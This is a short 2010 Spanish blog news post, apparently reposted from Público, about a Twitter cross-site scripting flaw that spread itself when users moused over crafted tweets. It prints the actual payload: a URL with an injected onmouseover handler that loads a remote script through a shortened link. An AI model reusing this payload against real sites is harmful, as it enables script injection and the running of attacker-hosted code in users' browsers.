martes, 21 de septiembre de 2010

UN GRAVE FALLO DE SEGURIDAD EN TWITTER AFECTA A MILLONES DE USUARIOS

Un fallo de seguridad en la red social Twitter ha provocado que miles de cuentas del servicio de microblogging redirijan a páginas web de terceras partes o abran ventanas emergentes (pop-ups) —fundamentalmente de temática pornográfica y juegos— sin consentimiento del usuario.

Los usuarios tan sólo tienen que pasar el ratón por un enlace, sin necesidad de pinchar en él, para que sea abran dichas páginas.

La vulnerabilidad permite que, cuando se introduce código JavaScript en una URL tuiteada, se genera un mensaje especial. Una vez que otro usuario pasa el ratón por encima del mensaje, éste se reenvía automáticamente.

El virus puede detectarse por el siguiente enlace: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A7')


No es el único error: la web muestra gráficos de gran tamaño o mensajes sin sentido repletos de códigos. Algunos mensajes son meras manchas negras.

Por el momento el bug o fallo de seguridad sólo afecta a la página web de Twitter. Los servicios de terceras partes, como Tweedeck, se mantienen inmunes.

Como medida de preocupación es recomendable no abrir la página de Twitter hasta que el problema se ha subsanado. Por el momento, desde Twitter no se ha dado una explicación al respecto del error.

Fuente: Público

No hay comentarios:

Publicar un comentario en la entrada